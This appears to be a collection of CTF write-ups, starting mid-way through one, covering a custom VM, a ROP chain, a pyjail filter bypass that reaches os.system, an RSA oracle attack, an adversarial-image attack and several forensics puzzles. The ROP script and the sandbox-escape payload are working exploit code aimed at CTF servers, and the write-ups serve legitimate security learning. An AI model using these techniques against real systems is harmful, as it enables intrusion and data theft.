BITMASKmovc r1 0x2mul r9 r1#INCREMENT MEMORY OFFSETmovc r1 0x1add r8 r1 #IF BITMASK WAS 0 THEN IT OVERFLOWED SO WE ARE DONE WITH THE LOOP/TOKENmov r0 r9jmpz 2#JUMP TO START OF LOOP TO HANDLE NEXT BITjmp -15 #DONE WITH THIS LOOP, STORE THE ASSEMBLED TOKEN IN MEMORYmovto r5 0 r6#INCREMENT TOKEN OFFSET BY ONEmovc r1 0x1add r6 r1#CHECK IF WE ARE DONE WITH THE ENTIRE DECODEmov r0 r6movc r1 0x3jmpg r1 2#WE ARE NOT DONE WITH DECODE, JUMP TO DECODE NEXT TOKENjmp -24 #DONE DECODING NOW IT'S TIME FOR MAGIC#LOAD TOKENS FROM MEMORY INTO REGISTERSmovc r9 0x0movfrom r0 0 r9movfrom r1 1 r9movfrom r2 2 r9movfrom r3 3 r9#GET FLAGmagic```Sending this code to the remote host gives back the register values 1718903650, 1664377723, 1735289192, 1601399135, 2037527414, 1869571935, 8220516. These can be parsed by the following python script:```nums = [1718903650, 1664377723, 1735289192, 1601399135, 2037527414, 1869571935, 8220516] bytes = [a.to_bytes(4, 'little') for a in nums]unpacked_bytes = [item for sublist in bytes for item in sublist]chars = [chr(a) for a in unpacked_bytes]print("flag: " + "".join(chars))```Which results in the flag:```bctf{c4ching_is_v3ry_goodo}```
Simple rop challenge where the goal is to read the flag from the server without getting shell, because all the binaries are removed from the server```pyfrom pwn import * # 0x000000000040100b: pop rax; ret;def pop_rax(v): try: return p64(0x000000000040100b) + p64(v) except struct.error: return p64(0x000000000040100b) + v # 0x0000000000401793: pop rdi; ret;def pop_rdi(v): return p64(0x0000000000401793) + p64(v)# 0x0000000000401713: pop rsi; ret;def pop_rsi(v): return p64(0x0000000000401713) + p64(v)# 0x0000000000401f31: pop rdx; ret;def pop_rdx(v): return p64(0x0000000000401f31) + p64(v)# 0x0000000000401ab2: syscall; ret;def syscall(): return p64(0x0000000000401ab2) # 0x000000000040213a: mov dword ptr [rdi], eax; or eax, 0xffffffff; ret;def write_into_rdi_eax(): return p64(0x000000000040213a) def WriteStringToLocation(string, location): string = string + b'\0' * (4 - (len(string) % 4)) o = b'' for i in range(0, len(string), 4): s = string[i:i+4] + b'\0' * 4 o += pop_rdi(location) o += pop_rax(s) o += write_into_rdi_eax() location += 4 return o padding = cyclic(1024).split(b'yaaczaad')[0]bss = 0x0000000000405340 payload = padding# payload += WriteStringToLocation(b'flag.txt', bss)payload += WriteStringToLocation(b'/pwn/flag.txt', bss) # open('/pwn/flag.txt', O_RDONLY)payload += pop_rax(2) #openpayload += pop_rdi(bss)payload += pop_rsi(0)payload += pop_rdx(0)payload += syscall() # read(fp, bss(flag), 50)payload += pop_rax(0) #readpayload += pop_rdi(3) #fppayload += pop_rsi(bss)payload += pop_rdx(50)payload += syscall() # write(stdout, bss(flag), 50)payload += pop_rax(1) #writepayload += pop_rdi(1) #fppayload += pop_rsi(bss)payload += pop_rdx(50)payload += syscall() open('tmp', 'wb').write(payload) p = remote("tamuctf.com", 443, ssl=True, sni="one-and-done")# p = process('./one-and-done')p.recvline()p.sendline(payload)print(p.recvline()) ```
The binary does not properly seed random values. Thus, we can expect the same outcome every time. We patched the original binary to always succeed and then exame all the correct words. ```./gambler-baby1.patched | grep wordCorrect word: nwlrCorrect word: bbmqCorrect word: bhcdCorrect word: arzoCorrect word: wkky``` Thus, our solution just calls the output from the [patched binary](https://github.com/tj-oconnor/ctf-writeups/blob/main/b01lers_ctf/gambler_baby/gambler-baby1.patched) and feeds it to the unpatched binary. ```python from pwn import * binary = args.BIN context.terminal = ["tmux", "splitw", "-h"]e = context.binary = ELF(binary)r = ROP(e) gs = '''continue''' def start(): if args.GDB: return gdb.debug(e.path, gdbscript=gs) elif args.REMOTE: return remote('ctf.b01lers.com', 9201) else: return process(e.path) p = start()patched_p = process('./gambler-baby1.patched') while (True): try: patched_p.recvuntil(b'Correct word: ') line = patched_p.recvline().strip(b'\n') p.sendline(line) print(p.recvline()) except: breakp.interactive()```
# Mysterious Broadcast I know, I know, there are other more elegant and faster ways... But it's Linux .... and Bash... Challenge Description: ```bashMysterious Broadcast100HardThere used to be 8 Models of humanoid cylon but now there are only 7. We've located one of their broadcast nodes but we can't decode it. Are you able to decipher their technologies? http://173.230.134.127 Author: blakato```We go to the URL of the challenge and we only see a symbol `~`, if we refresh the page several times, we see that it changes. `~110...` looks like a binary code. If we loop over the page by curling it, we may be able to get the complete message. We then proceed to test with a bash script (I know, it's not the most elegant or beautiful, but it works.) ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Web/Mysterious_Broadcast]└─$ cat looping.sh #!/bin/bashloop="http://173.230.134.127/seq/f6456df7-ddc7-473f-89c8-89f083bb938f" for i in {1..800}do curl $loopdone```and the console output of the script is.. ```bash ┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Web/Mysterious_Broadcast]└─$ ./looping.sh ~1100011011001011010001101010110010010001111011010011011110100011011000100111011010101100001101011111011001001010110001101100001000101011001110100011101101110110001100001010101011001110100101101000110001011011011010010110100011000111101101101001001110011000011110011101111010111101~1100011011001011010001101010110010010001111011010011011110100011011000100111011010101100001101011111011001001010110001101100001000101011001110100011101101110110001100001010101011001110100101101000110001011011011010010110100011000111101101101001001110011000011110011101111010111101~110001101100101101000110101011001001000111101101001101111010001101100010011101101010110000110101111101100100101011000110110000100010101100111010001110110111011000110000101010101100111010010110100011000101101101101001011010001100011110110 ``` We see that what is inside the `~` is repeated, it is a message that repeats. We save it with the name `sequence.in` to analyze it (yes, I could have done it directly from the script, but :) ). ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Web/Mysterious_Broadcast]└─$ echo "1100011011001011010001101010110010010001111011010011011110100011011000100111011010101100001101011111011001001010110001101100001000101011001110100011101101110110001100001010101011001110100101101000110001011011011010010110100011000111101101101001001110011000011110011101111010111101" > sequence.in ``` We know from the statement of the problem that **There used to be 8 ..... but now there are only 7**, then we proceed to arrenge the `sequence.in` file,for this, we use the linux commands [`fold`](https://linux.die.net/man/1/fold) and [`tr`](https://linux.die.net/man/1/tr) ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Web/Mysterious_Broadcast]└─$ fold -b7 sequence.in | tr "\n" " " > data.in ``` ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Web/Mysterious_Broadcast]└─$ cat data.in 1100011 0110010 1101000 1101010 1100100 1000111 1011010 0110111 1010001 1011000 1001110 1101010 1100001 1010111 1101100 1001010 1100011 0110000 1000101 0110011 1010001 1101101 1101100 0110000 1010101 0110011 1010010 1101000 1100010 1101101 1010010 1101000 1100011 1101101 1010010 0111001 1000011 1100111 0111101 0111101 ``` Once we have the file arranged in 7-bits words, we transform it to ASCII using [`xxd`](https://linux.die.net/man/1/xxd). (Again, many ways to do this, including web tools that are much faster than writing a script, but where's the fun in that? and the learning?) For our friend [StackOverFlow](https://stackoverflow.com/questions/49075346/binary-to-ascii-conversion-using-xxd) we know this: "If you want to stick with `xxd`, then you need to first convert each binary number to decimal. If you're using bash, and `x` contains you're binary string, then: `for a in $x; do printf "%x" $((2#$a)); done | xxd -r -p` `$((2#$a))` is binary to decimal conversion in bash, and the `printf` will convert this to hex. Then just pipe it to `xxd -` and get what you got before." Now we only have to re-arrange our statement to execute it and obtain the desired conversion. For that, we store the data in a variable and do a `for` to convert each 7-bit word into an ASCII character. ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Web/Mysterious_Broadcast]└─$ data=$(cat data.in); for byte in $data; do echo $(printf '%x\n' "$((2#$byte))"); done | xxd -r -pc2hjdGZ7QXNjaWlJc0E3Qml0U3RhbmRhcmR9Cg==``` This result looks like a base64 encoding, we decode it in the following way ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Web/Mysterious_Broadcast]└─$ echo "c2hjdGZ7QXNjaWlJc0E3Qml0U3RhbmRhcmR9Cg==" | base64 -dshctf{AsciiIsA7BitStandard}``` We have the challenge flag! - - - ### Final Notes. Linux plays an incredibly important part in the job of a cybersecurity professional. Specialized Linux distributions such as Kali Linux are used by cybersecurity professionals to perform in-depth penetration testing and vulnerability assessments, as well as provide forensic analysis after a security breach. Linux Shell scripts have several required constructs that tell the shell environment what to do and when to do it. Of course, most scripts are more complex than the above one. The shell is, after all, a real programming language, complete with variables, control structures, and so forth. No matter how complicated a script gets, it is still just a list of commands executed sequentially thanks, [FITSEC Team](https://floridatech.campuslabs.com/engage/organization/fitsec) for the excellent CTF. For fun and knowledge, always think out of the box! :)
I had virtually no previous experience with PyTorch and am no ML expert, but after some googling I found [an article](https://pytorch.org/tutorials/beginner/fgsm_tutorial.html#fgsm-attack) on Fast Gradient Sign Attacks that seemed like just the thing.I took the provided server source, gutted it, and after some more googling managed to hack together [this](https://gist.github.com/shinmai/7d354e6b761edaffef1d83c33ca9e6d8) quick and dirty script: ```import torchfrom torchvision.models.resnet import resnet18from torchvision.utils import save_imagefrom base64 import b64encode as b64from Embedding import keyfrom io import BytesIO device='cuda' model = resnet18(pretrained=True).to(device) #get embedding rather than logits from final layermodel.fc = torch.nn.Identity() key = torch.tensor(key).to(device)tensored = torch.rand(1, 3, 224, 224).to(device) # https://pytorch.org/tutorials/beginner/fgsm_tutorial.html#fgsm-attackwhile True: tensored.requires_grad_() embedding = model(tensored)[0] diff = ((embedding - key)**2).mean() if diff.item() < 1e-4: b = BytesIO() save_image(tensored[0], b, format="png") print(b64(b.getvalue()).decode()) break diff.backward() tensored = tensored.detach() - tensored.grad * 64``` It generates a payload in a few seconds even on my old busted up desktop.Commanding something like `nc ctf.b01lers.com 9101 < <(python resnet_fgsm.py)` we get```Input base64 image passwordImage embedding differed by 9.715177293401212e-05Nice! Here's the flag: bctf{8acKWa7d_Grad!ents?}```
# <|-- Incognito 3.0 - xD --|> For this challenge we were given nothing more than a file named tv_chal.jpg.As there was no hint nor description available, we approached this with some basic recon first... ----- ## <- Some recon to get an idea of what we need to do -> Before we run the image file through any of our tools, let's first do `eog tv_chall.jpg` to see if we can view the image before proceeding. Our image viewer throws an error, telling us that it does not recognize the image as an actual JPEG. ![](https://user-images.githubusercontent.com/104336820/165018827-0ee7e2c9-7103-478c-b879-91b24dc34044.png) Of course, we didn't expect it to be as easy as that but nonetheless, it is always a good idea to run down the list of possible avenues to gain any extra info you can. Next, we run some basic tools to get some more technical information about the image we are working with. We put the file through binwalk first with `binwalk -e tv_chal.jpg` ![](https://user-images.githubusercontent.com/104336820/165020194-2a2a0689-4478-4fd9-bf4f-2de5ef113c02.png) binwalk shows us that there is nothing here to extract. This leads us to believe that maybe we should look at the metadata as we now know the flag isn't in a file that we need to extract. The image started life as a TIFF type. Nothing odd here so moving on to try to dig a bit deeper. We fire up exiftool with `exiftool -v tv_chal.jpg` to take a look at the metadata of the file. Here we find a couple of things of interest... ![](https://user-images.githubusercontent.com/104336820/165020443-d386a41f-2448-4eb6-9ff2-6ac16eeab562.png) exiftool gives us a warning that we have an unknown 30-byte header. Then it proceeds to reset the file type as the header configuration is unrecognized which results in our inability to view the image in its current state. All of our recon has led us to assume that the image itself contains the flag and likely it is a matter of a corrupted header. We likely have ourselves a magic numbers issue. ----- ## <- Fixing the header -> To take a look at the header we use `hexeditor tv_chal.jpg` and immediately we are able to see that the file signature for a JPEG file is not what we have here for the magic numbers. ![](https://user-images.githubusercontent.com/104336820/165021657-cf2d5924-f090-44e5-bf89-538d467d63f1.png) Let's fix that! ![](https://user-images.githubusercontent.com/104336820/165021788-104b16c0-89cf-47d2-83b0-679c987cc082.png) Now that the magic numbers have been corrected, we check `eog tv_chal.jpg` again to see if we can view the image now... ![](https://user-images.githubusercontent.com/104336820/165021971-5fc73c3a-71a8-49e8-8eeb-bc2ae8cb63bd.png) Looks like the issue was indeed just a corrupted header! And in the corner of the television in the image, we can see an image of some text. If we zoom in we can retrieve our flag. ![](https://user-images.githubusercontent.com/104336820/165022223-d28d0fc8-9ca7-40bd-88f4-7e771656f216.png)
# Pelle's rotor supported arithmetic ## Challenge ```#!/usr/bin/python3from sys import stdin, stdout, exit#from flag import FLAGfrom secrets import randbelowfrom gmpy import next_primefrom Crypto.Util.number import bytes_to_long, long_to_bytes FLAG = bytes_to_long(b'mf{testowa_flaga_costam_costam}') p = int(next_prime(randbelow(2**512)))q = int(next_prime(randbelow(2**512)))n = p * qe = 65537 phi = (p - 1)*(q - 1)d = int(pow(e, -1, phi))d_len = len(str(d)) print("encrypted flag", pow(FLAG, 3331646268016923629, n))stdout.flush() ctr = 0def oracle(c, i): global ctr if ctr > 10 * d_len // 9: print("Come on, that was already way too generous...") return ctr += 1 rotor = lambda d, i: int(str(d)[i % d_len:] + str(d)[:i % d_len]) return int(pow(c, rotor(d, i), n)) banner = lambda: stdout.write("""Pelle's Rotor Supported Arithmetic Oracle1) Query the oracle with a ciphertext and rotation value.2) Exit.""") banner()stdout.flush() choices = { 1: oracle, 2: exit} while True: try: choice = stdin.readline() print("c:") stdout.flush() cipher = stdin.readline() print("rot:") stdout.flush() rotation = stdin.readline() print(choices.get(int(choice))(int(cipher), int(rotation))) stdout.flush() except Exception as e: stdout.write("%s\n" % e) stdout.flush() exit() ``` ## TL;TR; Encrypting at least 2 sets of messages: $m_3 = m_2\ m_1$, we can find $N$: `k*N = gcd(c1_1*c1_2-c1_3, c2_1*c2_2-c2_3)`, and get ride of `k` by dividing the result by small primes.Having $N$ we retrive $d$ digit by digit:$$ msg^{10\ d_r} = \frac{ c_{i+1}+kN}{msg^{digit}} $$$$ c_i^{10} = msg^{digit\ 10^{digitCount}}\ msg^{10\ d_r} $$ ## Solution I solved this challenge after the CTF. The script allows us the opportunity to encrypt our messages using d, the modular multiplicative inverse of e. We can encrypt more times than d has digits. This gives us a spare to calculate N. How to find N?$$ c_1\ c_2 = m_1^d\ m_2^d = (m_1\ m_2)^d = c_3 $$For modulo operation:$$ (m_1^d)\ mod\ N\ (m_2^d)\ mod\ N = (m_1\ m_2)^d\ mod\ N + kN $$$$ c_1\ c_2 - c_3 = kN $$ If we choose good messages so that $c_1\ c_2 > N$.Prepare 2 or 3 sets of messages. Using `gcd(k1*N, k2*N)` we should get N. But sometimes `gcd` still returns muiltiple of N. For assurance, one may try to divide it by small primes. So we have N. Next d. "Size" (number of digits) of $d$ cannot be greater than the number of digits of N. We can send the same message to encryption with i = [0... digits count for N] and compare results. When it will be equal to cipher for i=0. And we have the "size" of $d$. Next, what are adjacent ciphers look like: $$ d_{i} = digit\ 10^{digitCount-1} + d_r$$$$ d_{i+1} = 10\ d_r + digit $$$$ c_{i} = msg^{d_{i}} = msg^{digit\ 10^{digitCount-1}}\ msg^{d_r} $$$$ c_{i+1} = msg^{d_{i+1}} = msg^{10\ d_r}\ msg^{digit} $$$msg^{digit}$ for small msg is so small that iterating we can find $k$ that would fullfill condition:$$ c_{i+1} + kN\ mod\ msg^{digit} == 0 $$and next:$$ msg^{10\ d_r} = \frac{ c_{i+1}+kN}{msg^{digit}} $$Using $c_1$ to 10th power (**all modulo N**) we can compare cipher with out calculation for choosen $digit$:$$ c_i^{10} = msg^{digit\ 10^{digitCount}}\ msg^{10\ d_r} $$ So I check all digits, which one meets the condition. Havind $d$ we can calculate $\phi = d\ e-1$ and retrive the flag: ```fi = e*d-1D = pow(flag_power, -1, fi)M = pow(flag_cipher, D, N)print(f"{long_to_bytes(M)}")``` [sol.py](https://github.com/death-of-rats/CTF/blob/master/2022/midnightsun/pelle-rotor/sol.py)
[Original writeup](https://github.com/LambdaMamba/CTFwriteups/tree/main/picoCTF_2022/Forensics/Redaction_gone_wrong) (https://github.com/LambdaMamba/CTFwriteups/tree/main/picoCTF_2022/Forensics/Redaction_gone_wrong)
# incognito CTF 2022 ## pyjail 1 a python jail challenge which was filtering ```__``` so we couldn't call ```__builtins__``` or etc.after some fuzzing I found that ```%``` is also filtered. so there was an idea for me in fuzzing part I got that ```__``` will be replaced with nothing, ```%``` also replaced with nothing. THE IDEA => what if we write ```_%_```. YES , ```%``` would be replaced with nothing and now we have ```__```. so let's write our payload. 1) List all classes which are running in this python system by using this command. ```''._%_class_%_._%_mro_%_[1]._%_subclasses_%_()```.2) Find the index of ```<class 'os._wrap_close'>``` in this case the index of ```<class 'os._wrap_close'>``` is 138.3) Call the system module in ```__globals__``` to list files and directories by using this command ```''._%_class_%_._%_mro_%_[1]._%_subclasses_%_()[138]._%_init_%_._%_globals_%_['system']('ls')```.4) Show the flag string from ```jail1``` by using this command ```''._%_class_%_._%_mro_%_[1]._%_subclasses_%_()[138]._%_init_%_._%_globals_%_['system']('cat jail1')```. ## we got the flag ```ictf{REDACTED}``` there were 2 more pyjail challenges which we solved all of them.
[Original writeup](https://github.com/LambdaMamba/CTFwriteups/tree/main/picoCTF_2022/Binary_Exploitation/flag_leak) (https://github.com/LambdaMamba/CTFwriteups/tree/main/picoCTF_2022/Binary_Exploitation/flag_leak)
You'll get one png file which contains QR code. Scan it using **zbarimg** and a link to **google drive** will appear. **Download** the zip file from the google drive. **Crack** the zip file with any file cracking tool. After cracking the file, you'll get pass **qristal**. **Extract** the zip file and you'll get a lot of png files which were all QR codes. Use zbarimg or any QR extracting tool```bashzbarimg *.png > flags.txt Note: I replaced "QR-Code:" from all the lines using a text editor.``` You'll see many duplicate texts. So let's carve out the duplicates and get the unique ones only using python. ```pythonsanitized = []unique = [] with open('flags.txt', 'r') as f: x = f.readlines() for i in x: sanitized.append(i.replace('\n', '')) for i in sanitized: if i not in unique: unique.append(i) print(unique)``` **Output:**```text['CUCTF{This_is_fake_flag}', 'CUCTF{This_is_wrong_one}', 'CUCTF{Not_this_one}', 'CUCTF{can_you_scan_me?}'] ``` **Flag:** CUCTF{can_you_scan_me?}
We are given a .pcap file and the hint that the file was captured while somebody was drawing something on a ps4. Inside many HID packets.Lets open it with wireshark!At first I didn't see the HID Data Tab inside Wireshark but after trying other things I finally saw it: I exported all the relevant packets with Wireshark and got a 50mb json file... ## Parsing the data At first sight, everything seems normal but after trying to read all the data, I realized that there duplicate keys in the json file. Each button has the same key in the file so I had to first rename all the keys so that I could proceed. ### Fixing the mistake```pyt = open("data.json").read().split("\n")counter = 0out = "" for e in t: o = e if "usbhid.data.button" in e: counter+=1 e.replace("ton","ton"+str(counter)) if "usbhid.data.padding" in e: counter = 0 out = out+e+"\n" open("data_fixed.json","w").write(out)``` The json file has objects that look like this now: ```json"usbhid.data_tree": { "usbhid.data.report_id": "0x01", "usbhid.data.axis.x": "123", "usbhid.data.axis.y": "124", "usbhid.data.axis.z": "123", "usbhid.data.axis.rz": "124", "usbhid.item.local.usage": "0x39", "usbhid.data.button1": "0", "usbhid.data.button2": "0", "usbhid.data.button3": "0", ...```Important for us are just the x & y axis as well as the 2nd button which indicates if the user is drawing.### Compressing the dataA 50mb file takes some time to process so I converted it to a smaller filesize by just keeping everything relevant:```pyimport json data = json.load(open("data_fixed.json")) new = list() for e in data: if "usbhid.data_tree" in e["_source"]["layers"]: tree = e["_source"]["layers"]["usbhid.data_tree"] new.append(tree) json.dump(new, open("small.json","w"))``` Still 14mb but thats enough. ## Visualizing the movements I wanted to visualize the movements of the cursor/controller so I choosed the turtle package in python which also animates it nicely. Using the coordinates I got, I let the turtle draw an image. Whenever the 2nd Button gets pressed, I switched the turtle to drawing mode. It looks like movements... but not like a real drawing... From the shape of it, I would guess that it represents the stick itself! Now we need to convert that to a proper image, where the movements of the stick correspond to the acceleration of the cursor. ```pyimport jsonimport turtles = turtle.getscreen()s.screensize(100000,10000) t = turtle.Turtle()t.pensize(2)t.penup()t.speed(10) f = json.load(open("small.json")) a = input() for e in f: x = t.xcor() y = t.ycor() lxacc = int(e["usbhid.data.axis.x"])-123 lyacc = int(e["usbhid.data.axis.y"])-123 t.setx(x + int(lxacc/31)) t.sety(y + (int(lyacc/31))*-1) if e["usbhid.data.button2"] != "0": t.pendown() else: t.penup() p = input()```I needed to choose the canvas size so high as I did not know how to properly downscale everything.The final result looks like this: Done! *Click the link for images*